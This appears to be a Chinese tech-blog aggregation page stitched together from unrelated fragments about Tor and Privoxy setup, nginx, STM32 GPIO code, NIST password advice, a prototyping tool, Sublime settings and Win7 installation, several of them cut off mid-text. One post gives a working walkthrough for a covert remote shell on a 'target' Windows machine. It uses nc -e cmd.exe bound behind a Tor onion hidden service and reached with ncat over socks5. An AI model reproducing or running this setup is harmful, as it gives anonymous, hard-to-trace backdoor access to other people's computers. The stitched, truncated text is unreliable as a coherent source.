操作系统

Tor 网桥获取 deep web

[ 访问网桥帮助文档](https://tb-manual.torproject.org/en-US/bridges.html ) – [ 在线获取](https://bridges.torproject.org/ ) -通过Gmail发送电子至邮件 [email protected]的 参考: 1.Deep Web 2.暗网导航

CentOS+tor+Privoxy 服务搭建 + Ubuntu + tor+Privoxy服务搭建 + 匿名网站搭建

CentOS+tor+Privoxy 服务搭建(要出墙tor才可正常使用): sudo yum install epel-release 不然没有源 sudo yum install tor service tor start 启动服务 检查服务状态 service tor status sudo yum install privoxy 安装 要修改一下privoxy 配置文件 将tor 和privoxy整合 vi /ect/privoxy/config 搜索/forward-socks5t 找到注释拿掉 ESC wq保存退出 启动privoxy service privoxy start 启动完成检查状态 status 这样就完成了服务搭建 设置完成代理 检查是否成功 访问https://check.torproject.org/ 验证 Ubuntu + tor + Privoxy 服务搭建: ubuntu相对来说就好点了 配置好可靠的源 update sudo apt-get install tor service tor start 检查服务 status sudo apt-get install privoxy 同样修改配置 vi /ect/privoxy/config 搜索/forward-socks5t 找到注释拿掉 ESC wq保存退出

看我如何通过Tor Onion在Windows中执行远程Shell

在这篇文章中,我将跟大家分享我的一个小发现,即如何在Windows平台中通过Tor Onion服务来开启远程Shell 。接下来,话不多说,我们直奔主题。 操作方法 首先,我们要在一个Windows Tor客户端中创建一个Tor onion服务(即隐藏服务)。我下载了Tor Expert bundle(同样适用于Tor浏览器)-【下载地址】。 然后使用下列命令创建Tor配置文件torrc: HiddenServiceDir C:\demo\Tor\service HiddenServicePort 8662 127.0.0.1:12345 开启Tor服务之后,将会自动创建目录C:\demo\Tor\Service,并填充一系列必要的文件(<主机名>文件夹包含了这个Toronion服务的.onion地址)。 该onion服务将监听端口8662,而流量将会直接转发到127.0.0.1(端口12345)。 这里我们还可以给服务开启客户端验证功能,因为如果不开启这个功能的话,任何知道这个.onion地址和端口号的人都可以进行连接。最基础的客户端验证使用了共享密钥,你可以使用下列命令进行配置(torrc): HiddenServiceAuthorizeClient basic testuser 这里我选择使用testuser作为客户端名称: 接下来,我们可以使用配置文件torrc来开启Tor: tor.exe -f torrc .onion地址以及客户端验证cookie可以在service目录的<主机名>文件夹中找到: nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser 当然了,你一定要保护认证cookie密钥的安全。 现在,用nc.exe在目标Windows设备上开启服务(我几年前就在电脑上下载了nc.exe,我不记得原始的URL地址了,我使用的版本是v1.11,MD5为ab41b1e2db77cebd9e2779110ee3915d): nc -e cmd.exe -L -s 127.0.0.1 -p 12345 Tor ExpertBundle以及nc.exe不需要任何其他的依赖组件(跟DLL类似),因此任意用户都可以直接运行。 现在我们的目标主机已经配置好了,在另一台设备上,我需要使用包含了认证cookie的配置文件来开启Tor服务: HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g 接下来,我们需要运行ncat,因为ncat.exe支持socks5代理(nc.exe不支持): ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662 接下来,我们就得到远程Shell啦! 提醒大家一下,这种方法不适用于ncat v 7.60版本,具体原因请参考【这里】: ibnsock select_loop(): nsock_loop error 10038: An operation was attempted on somethingthat is not a socket.

centos7 离线配置安装nginx

下载nginx包 tar -zxvf nginx-1.13.7.tar.gz cd nginx-1.13.7 安装 ./configure make clean ####清除./configure时产生的临时文件 可能会报错误 ### the HTTP rewrite module requires the PCRE library. ###显示需要pcre rpm -ivh pcre pcre-devle zlib zlib-devle ./configure 执行完成会看到 ### Configuration summary + using system PCRE library + OpenSSL library is not used + using system zlib library nginx path prefix: “/usr/local/nginx” nginx binary file: “/usr/local/nginx/sbin/nginx” nginx modules path: “/usr/local/nginx/modules” nginx configuration prefix: “/usr/local/nginx/conf” nginx configuration file: “/usr/local/nginx/conf/nginx.conf”

STM32官方固件库代码解读–GPIO

最近闲得无聊,又把 stm32 拿了出来。之前学的时候是看的库函数版本,现在和寄存器版本的一起看感觉比一开始接触的时候看得顺畅多了,详细了解了底层寄存器的功能。之前用 stm32 只是调用函数,看了寄存器版本后对那些实现具体细节的库函数代码产生了兴趣,所以稍微看了看库函数的代码,同时把一些难理解的地方也记录下来。 我用的是 ALIENTEK 的战舰版,看的也是他们的开发指南,这里我就写对库函数代码的理解,寄存器种类和功能等指南里面有的我基本不写了。 一开始是 GPIO,学任何单片机一开始都是流水灯。stm32 的每组 GPIO 有 7 个寄存器,功能这里就不介绍了,网上很多。官方库里关于 GPIO 有 18 个函数,看了几个常用的,如下 void GPIO_Init(GPIO_TypeDef* GPIOx, GPIO_InitTypeDef* GPIO_InitStruct); uint8_t GPIO_ReadInputDataBit(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin); uint16_t GPIO_ReadInputData(GPIO_TypeDef* GPIOx); uint8_t GPIO_ReadOutputDataBit(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin); uint16_t GPIO_ReadOutputData(GPIO_TypeDef* GPIOx); void GPIO_SetBits(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin); void GPIO_ResetBits(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin); void GPIO_WriteBit(GPIO_TypeDef* GPIOx, uint16_t GPIO_Pin, BitAction BitVal); void GPIO_Write(GPIO_TypeDef* GPIOx, uint16_t PortVal); 这些函数除了第一个初始化函数以外其他都很简单,了解一下寄存器的功能就能看明白代码了,这里只写一下初始化函数。 代码如下: void GPIO_Init(GPIO_TypeDef* GPIOx, GPIO_InitTypeDef* GPIO_InitStruct) { uint32_t currentmode = 0x00, currentpin = 0x00, pinpos = 0x00, pos = 0x00; uint32_t tmpreg = 0x00, pinmask = 0x00; /* Check the parameters */ assert_param(IS_GPIO_ALL_PERIPH(GPIOx)); assert_param(IS_GPIO_MODE(GPIO_InitStruct->GPIO_Mode)); assert_param(IS_GPIO_PIN(GPIO_InitStruct->GPIO_Pin)); /*---------------------------- GPIO Mode Configuration -----------------------*/ currentmode = ((uint32_t)GPIO_InitStruct->GPIO_Mode) & ((uint32_t)0x0F); if ((((uint32_t)GPIO_InitStruct->GPIO_Mode) & ((uint32_t)0x10)) !

kali安装tor

 http://www.blackmoreops.com/2013/12/16 /installing-tor-kali-linux/ Home Kali Linux Hacking How to Virtual Private Network (VPN) Popular Categories AMD Command Line Interface (CLI) Denial-of-Service Attack (DoS) Desktop Managers Security Linux Linux Administration News NVIDIA VirtualBox Wireless LAN (Wi-Fi) Contact Us Disclaimer Privacy Policy Wednesday , August 16 2017 Home Kali Linux Hacking How to Virtual Private Network (VPN) Popular Categories AMD Command Line Interface (CLI) Denial-of-Service Attack (DoS) Desktop Managers Security Linux Linux Administration News NVIDIA VirtualBox Wireless LAN (Wi-Fi) Contact Us Disclaimer Privacy Policy blackMORE Ops Learn one trick a day ….

强密码和弱密码并没有什么区别?NIST密码安全标准更新:不再建议密码要求混合大写字母、字符和数字

作为一名认真负责的小编,每次注册账号设置密码的时候都是最痛苦的,太简单的怕被破解,太难的又记不住。 等你好不容易记住密码,三个月后IT同学过来拍拍你的肩膀,“你的密码到期了,记得改啊……” 目前绝大部分网站对于注册账号的密码强度分为3个等级:弱密码、中密码、强密码。网站会引导用户填写密码的时候混合大写字母、字符和数字的强密码。 但这种密码设置要求来源于美国国家标准和技术协会(NIST)。当年NIST主管Bill Burr撰写了一份名为NIST Special Publication 800-63的文档,建议大家设置密码时混合大写字母、字符和数字,并定期修改。这么成(keng)熟(die)的建议后来被各大媒体广为传播,一时传为美谈。 紧接着国内外网站纷纷响应,吃瓜群众创造了各种各样的花式密码。 单词间隔法:Pa55word!1 古诗转化法:Heartulx1.tong(心有灵犀一点通) 化学方程式:CH4+2O2=CO2+2H2O 键盘顺序法:1qaz@WSX …… 但在今年6月,原作者后悔了……美国国家标准和技术协会(NIST)提供的最新数字身份指南的新版草案中,不再推荐用户使用这一标准,因为研究显示此类标准,并没有什么卵用…… 比如形似“Tr0ub4dor&3”这样的密码只需要用标准的破解技术在三天之内就能够破解,而且你很容易在被破解之前就忘掉自己的密码。而一句完全采用英文单词组成的摸不着头脑的短语 “correct horse battery staple”却需要约550年来破解。(如来佛祖的五指山都压不住啦) 而这组词语很容易形成独特的画面,对于人类来说非常容易形成记忆,但对计算机来说堪比天书,使得它很难被破解。 图片来自网络 另外研究显示,频繁的更改密码没有预想的效果,达不到保护密码安全的目的。因为大多数人应对 90 天更改密码要求采取的做法是将现有密码略微修改一下,比如 Pa55word!1 改为 Pa55word!2,完全起不到保护作用,很容易被猜出。 NIST数字身份指南的新版草案作者 Paul Grassi指出,此前的密码安全建议都是在摸索中前进,没有前人的尝试也无法摸索出切实有效的密码建议。所以也不再建议大家密码要求混合大写字母、字符和数字。他认为最重要的是储存的密码必须盐化哈希 MAC 处理。 密码的复杂性对于个人用户来说很重要,但对于提供登录场景的互联网企业来说,风险防控更加重要,它是保护用户账号安全的最后一道防火墙。 即便在用户无意间泄露密码,或密码设置过于简单的情况下,企业能基于用户行为、软硬件环境信息、业务基础信息综合判定用户登录请求的风险程度,避免机器人撞库或者非本人登录。阿里聚安全提供的数据风控功能,能有效对登录场景进行防控,防止刷库撞库、暴力破解、可疑登录等。并提供滑动验证码服务,通过生物特征判定操作计算机的是人还是机器,从而取代传统验证方式。 阿里聚安全 – 数据风控 阿里聚安全的数据风控功能,目前免费试用,欢迎来体验测试! 免费体验地址:http://jaq.alibaba.com/riskcontrol ———— 更多安全热点资讯和知识分享,请关注阿里聚安全的官方博客

墨刀使用总结

使用墨刀进行原型设计总结 墨刀是一个原型设计软件,在本次系统分析课程的电影售票应用泡影APP的原型设计中我们使用了它。虽然可能功能没有那么完整,但已经基本够用。目前墨刀分为网页版和客户端,网页版可以直接使用,客户端在网页版的功能的基础上增加了诸如可以随时提取页面中某一颜色然后应用于对应控件等小功能。 下面我们以网页版墨刀为例来进行使用总结: 一、创建新的应用 访问墨刀官网,登录之后会看到如下的页面: 点击右上方的创建应用,可以选择不同的模板和设备类型,填写应用名称之后即可完成应用的创建,比方说上图的泡影就是我创建的一个应用,然后我们可以随时编辑应用或者与他人共同编辑和分享应用。 二、编辑应用 点击我们创建的对应应用进行编辑,进去之后会看到下图,其分为菜单栏、组件栏、编辑栏和预览排列栏几个部分。最左边是组件栏,我们可以在这里选择需要的组件,然后拖拽到中间编辑栏中进行设计;中间编辑栏里可以对选取的组件进行编辑;右边是预览排列,就是最终我们看到的页面的基本排列。 1、组件使用 如图,我们把左边组件栏中的一些组件拉到这个中间的编辑栏,通过双击对应的组件进行文字或者颜色的编辑: 2、页面管理 对于页面的管理,我们可以在最右边的页面管理栏进行新建或者复制页面,这样我们的原型也可以在不同页面之间跳转,如下图所示是一个原型部分页面树图: 3、页面跳转 如果要进行页面之间的跳转,可以点击组件,然后拉动组件旁边的超链接的样式图标到相应页面即可执行进行页面跳转功能,如下图所示: 三、导出下载图片或者安装包 点击页面上方的下载图标,具体如下图所示: 四、运行分享应用 点击页面上方的运行图标即可运行编辑的应用,而后在运行页面右方通过分享图标可以生成分享链接,如下图所示:

sublime配置及使用技巧

如果需要 vim 配置,可以移步 面向 web 前端及 node 开发人员的 vim 配置 sublime 3 配置和使用技巧 第一步,设置settings 一下是我个人喜欢的格式配置,在perferences -> settings { "color_scheme": "Packages/User/SublimeLinter/MarkdownEditor-Dark (SL).tmTheme", //颜色风格 "font_size": 16, //字体大小 "indent_using_spaces": true, //使用空格缩进 "tab_size": 2, //一次缩进2个空格 "translate_tabs_to_spaces": true, //tab自动转化为空格 "trim_trailing_white_space_on_save": true, //保存时去除尾部多余空格 "expand_tabs_on_save": true, //保存时重写tab设置 "shift_tab_unindent": true, //使 shift+tab 等效为 command+{快捷键 "spell_check": true, //开启拼写检查 "line_numbers": true, //显示行号 "folder_exclude_patterns": [".svn", ".git", ".hg", "CVS", "node_modules"], //忽略查找元素 "ignored_packages": ["Vintage"], //忽略使用的插件 "ensure_newline_at_eof_on_save": true, //确保文件结尾有一个空行 "save_on_focus_lost": true, //失去焦点时储存 "atmic_save": true //自动存储 } 关于expand_tabs_on_save,我们需要额外添加python代码,方法如下: 1.

联想 昭阳 E41-80 i7-6500U 安装 win7 方法说明

i7-6500U 属于 Intel 第六代 CPU , 核心架构采用 Skylake 平台使用了XHCI主控代替了以前的EHCI主控,win7安装盘里却没有这个驱动,所以除非你用光盘安装系统,如果你用U盘安装,还没开始装,USB本身就已经失效了。 那么既然你可以用光盘装,好吧,我把你虚拟挂载在光盘目录下,不就解决这个问题了嘛。 下载老毛桃 UEFI 系统镜像 http://www.laomaotao.net/ 烧录老毛桃 UEFI U盘启动盘 http://www.laomaotao.org/jiaocheng/UEFIbqdzz.html 拷贝 WIN7 官方系统镜像 ISO 文件 到 U 盘 http://www.wingod8.com/a/yuanbanxitong/win7/463.html 下载并安装光盘挂载软件 OSFMount 并将解压出来的软件整体拷贝到 U 盘中 http://www.osforensics.com/tools/mount-disk-images.html 插上 U 盘 启动电脑 在 LENOVO 界面按 F2 进入 BIOS 设置 BOOT –> “Legacy Support” “UEFI First” 重启后选择 “Win8PE系统” 使用 OSFMount 挂载 ISO 光盘镜像 打开我的电脑 双击CD/DVD 安装即可 http://www.arpun.com/article/7124.html ========================================================================== 后来在网上看到了这样一篇文章,发出链接和大家共勉了!!! 手把手教你制作一个可以在skylake上安装win7的U盘 http://www.51nb.com/xinwen/benzhanshiye/2015-10-05/70380.html